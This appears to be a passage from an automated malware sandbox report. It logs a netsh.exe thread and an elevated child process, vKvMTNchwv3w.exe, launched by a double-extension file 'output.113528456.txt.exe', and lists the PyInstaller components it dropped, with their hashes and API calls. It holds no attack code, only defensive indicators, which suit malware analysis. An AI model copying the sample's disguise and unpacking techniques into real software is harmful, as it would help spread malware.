netutils.dll 0x73c50000 0x73c58fff Memory Mapped File rwx False False False -
netapi32.dll 0x73c60000 0x73c70fff Memory Mapped File rwx False False False -
comctl32.dll 0x74360000 0x744fdfff Memory Mapped File rwx False False False -
version.dll 0x748d0000 0x748d8fff Memory Mapped File rwx False False False -
firewallapi.dll 0x748e0000 0x74955fff Memory Mapped File rwx False False False -
userenv.dll 0x74a30000 0x74a46fff Memory Mapped File rwx False False False -
devrtl.dll 0x74bd0000 0x74bddfff Memory Mapped File rwx False False False -
logoncli.dll 0x74ca0000 0x74cc1fff Memory Mapped File rwx False False False -
dnsapi.dll 0x74cd0000 0x74d13fff Memory Mapped File rwx False False False -
mswsock.dll 0x74e10000 0x74e4bfff Memory Mapped File rwx False False False -
bcrypt.dll 0x74f80000 0x74f96fff Memory Mapped File rwx False False False -
wevtapi.dll 0x75010000 0x75051fff Memory Mapped File rwx False False False -
srvcli.dll 0x75220000 0x75238fff Memory Mapped File rwx False False False -
secur32.dll 0x75290000 0x75297fff Memory Mapped File rwx False False False -
sspicli.dll 0x752b0000 0x752cafff Memory Mapped File rwx False False False -
profapi.dll 0x75380000 0x7538afff Memory Mapped File rwx False False False -
msasn1.dll 0x753f0000 0x753fbfff Memory Mapped File rwx False False False -
devobj.dll 0x75400000 0x75411fff Memory Mapped File rwx False False False -
crypt32.dll 0x75420000 0x7553cfff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x75590000 0x755b6fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
wldap32.dll 0x75730000 0x75774fff Memory Mapped File rwx False False False -
nsi.dll 0x75810000 0x75815fff Memory Mapped File rwx False False False -
shell32.dll 0x75830000 0x76479fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
setupapi.dll 0x764b0000 0x7664cfff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
ws2_32.dll 0x77380000 0x773b4fff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
For performance reasons, the remaining 38 entries are omitted.
The remaining entries can be found in flog.txt.
Threads
Thread 0xa74
77 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-08-10 04:08:47 (UTC) True 1 Fn
System Get Time type = Ticks, time = 107453 True 1 Fn
Module Get Handle module_name = c:\windows\system32\netsh.exe, base_address = 0x1620000 True 2 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = RASMONTR.DLL, base_address = 0x6f8d0000 True 1 Fn
Module Get Address module_name = c:\windows\system32\rasmontr.dll, function = InitHelperDll, address_out = 0x6f8e6cb9 True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = NSHWFP.DLL, base_address = 0x6dd60000 True 1 Fn
Module Get Address module_name = c:\windows\system32\nshwfp.dll, function = InitHelperDll, address_out = 0x6ddbbbb2 True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = DHCPCMONITOR.DLL, base_address = 0x71f30000 True 1 Fn
Module Get Address module_name = c:\windows\system32\dhcpcmonitor.dll, function = InitHelperDll, address_out = 0x71f31cd4 True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = WSHELPER.DLL, base_address = 0x71f50000 True 1 Fn
Module Get Address module_name = c:\windows\system32\wshelper.dll, function = InitHelperDll, address_out = 0x71f5157b True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = NSHHTTP.DLL, base_address = 0x6ee90000 True 1 Fn
Module Get Address module_name = c:\windows\system32\nshhttp.dll, function = InitHelperDll, address_out = 0x6ee91b47 True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = FWCFG.DLL, base_address = 0x6dd40000 True 1 Fn
Module Get Address module_name = c:\windows\system32\fwcfg.dll, function = InitHelperDll, address_out = 0x6dd42a30 True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = AUTHFWCFG.DLL, base_address = 0x6dbb0000 True 1 Fn
Module Get Address module_name = c:\windows\system32\authfwcfg.dll, function = InitHelperDll, address_out = 0x6dbb4420 True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = IFMON.DLL, base_address = 0x6ee80000 True 1 Fn
Module Get Address module_name = c:\windows\system32\ifmon.dll, function = InitHelperDll, address_out = 0x6ee817a3 True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = NETIOHLP.DLL, base_address = 0x6db80000 True 1 Fn
Module Get Address module_name = c:\windows\system32\netiohlp.dll, function = InitHelperDll, address_out = 0x6db96e4b True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = WHHELPER.DLL, base_address = 0x6dd30000 True 1 Fn
Module Get Address module_name = c:\windows\system32\whhelper.dll, function = InitHelperDll, address_out = 0x6dd31c99 True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = HNETMON.DLL, base_address = 0x6db70000 True 1 Fn
Module Get Address module_name = c:\windows\system32\hnetmon.dll, function = InitHelperDll, address_out = 0x6db7200c True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = RPCNSH.DLL, base_address = 0x6db60000 True 1 Fn
Module Get Address module_name = c:\windows\system32\rpcnsh.dll, function = InitHelperDll, address_out = 0x6db62f94 True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = DOT3CFG.DLL, base_address = 0x6db40000 True 1 Fn
Module Get Address module_name = c:\windows\system32\dot3cfg.dll, function = InitHelperDll, address_out = 0x6db4a31d True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = NAPMONTR.DLL, base_address = 0x6b770000 True 1 Fn
Module Get Address module_name = c:\windows\system32\napmontr.dll, function = InitHelperDll, address_out = 0x6b77c7d5 True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = NSHIPSEC.DLL, base_address = 0x6b6b0000 True 1 Fn
Module Get Address module_name = c:\windows\system32\nshipsec.dll, function = InitHelperDll, address_out = 0x6b6b6910 True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = NETTRACE.DLL, base_address = 0x6b550000 True 1 Fn
Module Get Address module_name = c:\windows\system32\nettrace.dll, function = InitHelperDll, address_out = 0x6b59268b True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = WCNNETSH.DLL, base_address = 0x6da80000 True 1 Fn
Module Get Address module_name = c:\windows\system32\wcnnetsh.dll, function = InitHelperDll, address_out = 0x6da8228c True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = P2PNETSH.DLL, base_address = 0x6b440000 True 1 Fn
Module Get Address module_name = c:\windows\system32\p2pnetsh.dll, function = InitHelperDll, address_out = 0x6b4438e5 True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = WLANCFG.DLL, base_address = 0x6b360000 True 1 Fn
Module Get Address module_name = Unknown module name, function = InitHelperDll, address_out = 0x6b36c7d8 True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = WWANCFG.DLL, base_address = 0x6da70000 True 1 Fn
Module Get Address module_name = Unknown module name, function = InitHelperDll, address_out = 0x6da720ed True 1 Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh True 1 Fn
Module Load module_name = PEERDISTSH.DLL, base_address = 0x6b290000 True 1 Fn
Module Get Address module_name = Unknown module name, function = InitHelperDll, address_out = 0x6b30c796 True 1 Fn
Module Load module_name = kernel32.dll, base_address = 0x76910000 True 1 Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x769624c2 True 1 Fn
System Get Info type = Operating System True 1 Fn
File Open filename = STD_OUTPUT_HANDLE True 1 Fn
File Write filename = STD_OUTPUT_HANDLE, size = 5 True 1 Fn Data
File Open filename = STD_OUTPUT_HANDLE True 1 Fn
File Write filename = STD_OUTPUT_HANDLE, size = 2 True 1 Fn Data
Process #5: vkvmtnchwv3w.exe
301 0
Information Value
ID #5
File Name c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe
Command Line "C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe"
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:01:18, Reason: Child Process
Unmonitor End Time: 00:01:23, Reason: Self Terminated
Monitor Duration 00:00:05
OS Process Information
Information Value
PID 0xba4
Parent PID 0x9a4 (c:\users\eebsym5\desktop\output.113528456.txt.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xba8
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
private_0x0000000000040000 0x00040000 0x00040fff Private Memory rw True False False -
pagefile_0x0000000000050000 0x00050000 0x00056fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory rw True False False -
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory rw True False False -
private_0x00000000001d0000 0x001d0000 0x002cffff Private Memory rw True False False -
locale.nls 0x002d0000 0x00336fff Memory Mapped File r False False False -
private_0x0000000000340000 0x00340000 0x00437fff Private Memory rw True False False -
private_0x0000000000340000 0x00340000 0x003e4fff Private Memory rw True False False -
private_0x0000000000340000 0x00340000 0x003cbfff Private Memory rw True False False -
private_0x0000000000340000 0x00340000 0x003dffff Private Memory rw True False False -
private_0x0000000000340000 0x00340000 0x00465fff Private Memory rw True False False -
private_0x0000000000340000 0x00340000 0x003c7fff Private Memory rw True False False -
private_0x0000000000340000 0x00340000 0x003e8fff Private Memory rw True False False -
private_0x0000000000500000 0x00500000 0x0050ffff Private Memory rw True False False -
private_0x0000000000510000 0x00510000 0x00667fff Private Memory rw True False False -
private_0x0000000000510000 0x00510000 0x00792fff Private Memory rw True False False -
pagefile_0x0000000000510000 0x00510000 0x00902fff Pagefile Backed Memory r True False False -
vkvmtnchwv3w.exe 0x01250000 0x0129dfff Memory Mapped File rwx True True False
api-ms-win-core-synch-l1-2-0.dll 0x71f10000 0x71f12fff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
nsi.dll 0x75810000 0x75815fff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
ws2_32.dll 0x77380000 0x773b4fff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
Created Files
Filename File Size Hash Values YARA Match Actions
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._DES3.pyd 53.50 KB MD5: ef46c349a76a9c466014a6a67cbaac99
SHA1: 2f9ef385498261d129d2ced0096b56df30ac6afc
SHA256: 815430609a61ae49de9150e82e688c4175e296b2274aefa0373fe39bb4948042
SSDeep: 384:/xwYe6V2dqG5islrOmlpiFK4r4A5Zaqb/K2KUpH3d:5ve6V2MG5iKOmlyKwNR
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Random.OSRNG.winrandom.pyd 9.50 KB MD5: 0a3ec8fff372a800326eb8365de81f38
SHA1: 9707b3babda5d081f6c7188a00039721746c548c
SHA256: 17fbe1dd26ac0b49b7764d5f667fd12b9929b7fa9fa60395847cf80f653a0fdb
SSDeep: 192:bSI4ySF5IHS37idhL0zd3XXF2dqgeFI4BUKXKXecWnHcyZfgC:b4F5cQ7O+zhHF2KZZ
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll 2.51 MB MD5: 22ea7603bf1f1aaa2ae6d89ddc9cb663
SHA1: 30552231ad37b14a0bb3f8b95b4d700da8d4ef6c
SHA256: ac02f0ab3707eaf2d6980eeaf73cfd064e77121ce8a78d057be84c3b436746c5
SSDeep: 49152:Z3sX1oyMz3EzLZbDzRMLVCczh005HGVbgICqPdn4MMSH5agI+FTjq5+el30FXG:Z61oxVCczhpdN3g4MfHUl+aZSFX
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcr90.dll 637.83 KB MD5: b3892e6da8e2c8ce4b0a9d3eb9a185e5
SHA1: e81c5908187d359eedb6304184e761efb38d6634
SHA256: ae163388201ef2f119e11265586e7da32c6e5b348e0cc32e3f72e21ebfd0843b
SSDeep: 12288:Zhr4UCe8uLQrIYE8EdPz1n0/WGipK5d7AO7QlxxdmRyy1:981FYPz8WGip0d7AhpdmRyy1
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._AES.pyd 28.50 KB MD5: dd3db5480eb52e8f69d47f3b725e6bfb
SHA1: cb14cda7f5e3e2b88c823e4d15643680398b361e
SHA256: 51054f4d28782b6698b1b6510317650e797e11f87fa29fceaf8559b6bcbf4dfe
SSDeep: 384:9KckxaWHQuFS1bIYcBjZjKPzA37usOo8Vd6IHiPKDkAKB5F0riz4BPK27raf0:9DkxaywpjcJhaAahoICS4AI3GDm
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Include\pyconfig.h 20.82 KB MD5: bc185de8b2437963368a85fdd9852951
SHA1: 1459f1428214fcca7f203fb3a3aff28e16eb9c1b
SHA256: 8b130d901e0f83b55699d565f103f2f8f1b3a51712ebb4b9646ea517cc1f04d6
SSDeep: 384:pGpFpaU1kgCw8r+MIP8Bj5DvVySh3awQBoerw8W+PYV0FGYfN/+:pGpFpb+IU99UShATrw8W+AKF/+
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32wnet.pyd 24.50 KB MD5: 6de0ace298bfe90b36a173e7547f7c6a
SHA1: 871bbf9cd0c056b2aef11a0af83d07ee33ca46ca
SHA256: e5b51438204d762734625f3e03c571b3b90c2ecdc358af167bdbc6bea8a0d3e3
SSDeep: 768:9RZ5g+l3KQZrpJI+LXOJqIsmANOtrD5OEhrV262R:9RZ5g+l3KQZrpfLXOJqIsmANOtvhrV2Z
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_sqlite3.pyd 50.50 KB MD5: 2ac64a3ea631e7e43d01cbb149919da4
SHA1: 53ea53a48ee79c836c4b1ef8f3d58f69913cfdfe
SHA256: 1e7d4623b0d1953a02c604b782cf3f7d0bd84884e032c863f0d5f488af425dec
SSDeep: 1536:0/CFaMdXLQXytg5wInItlHCMRZYL2oITtepJW9X0b:RPDtlHCtPITt4E9Eb
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\main.exe.manifest 0.98 KB MD5: 7af6b943120fadcb5fd3115be3424dde
SHA1: 0b28564af655c64afcd0ba76369737b7c58daeae
SHA256: 003d7dacfc30ae2eee403ec2e18710c79de92d7bb338df3be8cfe7f8ed15945c
SSDeep: 12:TMHdtnQEH5ZCgV4SNXvNxW5v+MHCgVuNnhSN4XGpOvcNg4gv18zyiUGXwcGkVtvM:2dtn3ZEglN2v+zg4NnEN4X1me5rcb3S
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ctypes.pyd 91.00 KB MD5: 0927967ca911391c4e4ef10b950499a5
SHA1: 38c23cb6d6461ae1ed04b26835058d9367be63c2
SHA256: d44f765d24d572188c3d5ee803cf824b2db1e9bd4e6d1d95062cd6a764202cdd
SSDeep: 1536:SEXH04hVhg2JGa1ISZaf66lvIcEd+H4qk9R/Ec3LcGzVmH7WU3f:DU4Bg2JdqSZlPcAaE/P3LFzVmH7WU3f
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\unicodedata.pyd 672.50 KB MD5: e38072d0db1371b05fc861ccd1bb0a37
SHA1: 594fc3f069a791f96e910a3dac122a7a32331eea
SHA256: c83effcd8372389c2d3cff38fab5e41d0f7c96d9bb47a6e58de6ed63998ea3cb
SSDeep: 12288:+f3T3AxoMPBt8FpQsVdFiI5mZMPXubUxktwdQ:o3LxM8XQsVdXSPAxLdQ
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pyexpat.pyd 135.00 KB MD5: 5ee764051c2639c06764e3f7f97d249b
SHA1: a10a0b019da62cbb2b587df38770960f3b5905ce
SHA256: 18675152111924780b6c746a78f11936d8ba31f18418b8e255e579d932f2acf6
SSDeep: 1536:oJS1sIuMkXYi1xxB/c9gtOmPNg8i5RpExhvMnFRJsVsErYcisoJGCePyZSxBrzWb:AymkoToJnvK+sVU82J/vKvJUoW4
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_socket.pyd 47.00 KB MD5: aee0f99363c2445f47b6d64c30911d7e
SHA1: 2788e085d2a41497847e6867d3c0b553db4b4c29
SHA256: 59ef12178676e336d819f4e4b4d9c689fc51c95cd06ab9c5c1d06774f2657451
SSDeep: 768:8RsCOeSoO+rVa+KiejEG9SaFPBGsNoC+M6L1+UQX:iRO+rVXKicSaFP0C7gLBQ
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Microsoft.VC90.CRT.manifest 1.03 KB MD5: fedfdf2256720badeff9205e784b5dc8
SHA1: 014f80bbb14d6f9ed5fcf0757bf2bef1a22b3b88
SHA256: 6373fb8261af01506dc57dee535a0be800f3a59b18b0cc1e276807c746329ff6
SSDeep: 24:2dtn3mGv+zg4NnEN4XojC6vuVWV5rcb3S:ch35+zg4i0oKWmS
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\bz2.pyd 71.00 KB MD5: 6986a7cb6a80ef68644b1e9e5ec70545
SHA1: 15c426213be4d10c0b38443640ba8ac8068be7c8
SHA256: 27b035e9a0b63b1f4891dbae222dabd7a5756bfe1a504d9e9357d2b59b2fe5d9
SSDeep: 1536:ITfB9P4y4yhXYjrKV4S1uB8xgKvaGn6E8S+f0PP8fQKTiL:IrRYn04Su8xgKvaGn6XZfmAJTi
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\sqlite3.dll 540.00 KB MD5: c16381aa1c036104d6e4097463b69798
SHA1: df29e08edb9729e2829ec39b9003ee80202b35ed
SHA256: ffefe1cc04f2f0e47e43c8c823447637fab227482ea8b69c8d2b4e6198f00da4
SSDeep: 12288:4qSD9MQCNucGNXzIRbhapUqwdMMI9Z6z+lz3KRd4erm5jF:paWQCNu5zSaOq1jZ6y8deZF
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\select.pyd 11.50 KB MD5: d59d197f69aa42f0a5d4e8e0a75fb2b4
SHA1: e1cf2873e5285f3df574f1441865199f8d6c647d
SHA256: efca6435f01bc7399ef7907b6aeba9394b2966d46325f2a81f34eaa3c733dc4e
SSDeep: 192:qY35RZ+QmbQNw7MPDNqcSUpdkDXUnv3XDVR6ykXc1U5Us:qY35nLiAPDNSsdGXoPzV5uuds
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcp90.dll 556.33 KB MD5: db001faea818ae2e14a74e0adc530fc0
SHA1: 7db49c1a611b38a4f494b1db23087c751faa3de1
SHA256: 45cb405589c92bf74c47b7c90e299a5732a99403c51f301a5b60579caf3116e7
SSDeep: 12288:fCFE340h3e34GVZQACkIrYhUgiW6QR7t5183Ooc8SHkC2eHgAfl:fCh0h3e3vgzrA83Ooc8SHkC2eHgAfl
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcm90.dll 220.00 KB MD5: 7200dca324f3d1ecd11b2b1250b2d6c7
SHA1: df3219cfbc6f6ee6ef025b320563a195be46d803
SHA256: 636e12fea8c47ea528dba48827ac51a2e98b2ef0864854c9375b8170555c0a6e
SSDeep: 3072:Yk3eocziNzMLSMOYscmnWCAXm00LRk86Goao1IJU87/amFYw8fF01OyA9LX:v6OMqcEJAXb0LRn6fa3/amiX2Oy0
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pywintypes27.dll 107.50 KB MD5: a28653caf591fc7b4c7971821deb9a56
SHA1: 5ff590e23cbb45ae4a441eeecf2d0609103eec08
SHA256: 88d8eb5894c47990b4ff88e94a75f59c498cfd16b0f29894f0947f5ed2a862f3
SSDeep: 3072:VZsz18WtYUmuPcgxxKEYLRMMMHBBY2Y7bi0tf70fsNOK8dZ5TaY:VCzptYUmuEgxxKEYLRMbjY7bi0170EN4
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ssl.pyd 1.34 MB MD5: b1ce5ba4b67e186b393fb85fd18c59af
SHA1: c27eb759181e4dfd80eb5f0f5848787cb7ce4bfd
SHA256: 2a3911be8b1a2689de409188c1c72c3abe5ff0f51128f5d7a22b30e3a957ab97
SSDeep: 24576:3Toeiij2g9AqfUrSd7kq7iMfSDqq8I09tTTeCEi04ozFhmmvI+KpPQpzaGNXpJ+S:3sijeTrSd2ZV09tJP03YkaGJpJc2Lob0
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\win32pipe.pyd 23.50 KB MD5: 6d0b7d549cc16f4018fd67bec9bb771e
SHA1: 3b3d425886ea8678d4d7557fcc50c36951be27bf
SHA256: 654308420dd8362408b60e6d602c39101f1db75960112bc23f6298a810a1bf83
SSDeep: 384:TqFOIiDSVujmVnO7aNfnVs8jMDcqR56DUgnnVlyDIjM6D9cJ:OA/DSYiVnO7SBqRoBVRXD9c
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Hash._SHA256.pyd 10.00 KB MD5: fd7ba0d28b7809d0dc15aef9d7eaf62b
SHA1: c56d51ea4e61431918c3f0220e6f4c56d3eb9b52
SHA256: 36314665fa2a6effbe7a4280b2d420a438d02c40bd7b6a690a588490a2e8e4d0
SSDeep: 192:TidzghojQKuGhNUyA5jQjT8KW6WZXN7cLmoVktRcX3X62dqSea:udzgwLkjjoT8KQXgVktQK2H
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Util._counter.pyd 10.00 KB MD5: 7fec8c7c9fde5ac8f2eec8e5abdd1c56
SHA1: 82dd6659d95140b2a28e303044643cc4683155da
SHA256: 69c2d16001339775dba69bc884ed95602bc126b65bb9dcf96a779790dd41f52c
SSDeep: 192:LPDn3nSJIcNaVT6Gbp8wyhzh3X62dqH3:Lbn3nkNAT6Gl8lzdK2c
False
C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_hashlib.pyd 991.00 KB MD5: 2c3221968e7f644a1fae03106791d85b
SHA1: 8a51cf7dd9a1d51ceba1c1465d1aa3424c6fb744
SHA256: 878388c1ae7319f7d1a89d2c186c460f41f259055b63cda29f5008f4025f4c5e
SSDeep: 24576:+5UA5DF4x6jKzYpenuNnVgA4bO0+PwNAQpIUFLZsCZFpU8XrCSSa:cFc6WYpmuNVeODPOpIGFpU5SSa
False
Threads
Thread 0xba8
301 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-08-10 04:09:13 (UTC) True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x71f10000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x7696418d True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x769676e6 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x71f10000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x7696418d True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x76961e16 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x769676e6 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type True 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 2
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x7699f72b True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, file_name_orig = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, file_name_orig = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Environment Get Environment String name = _MEIPASS2 False 1
Fn
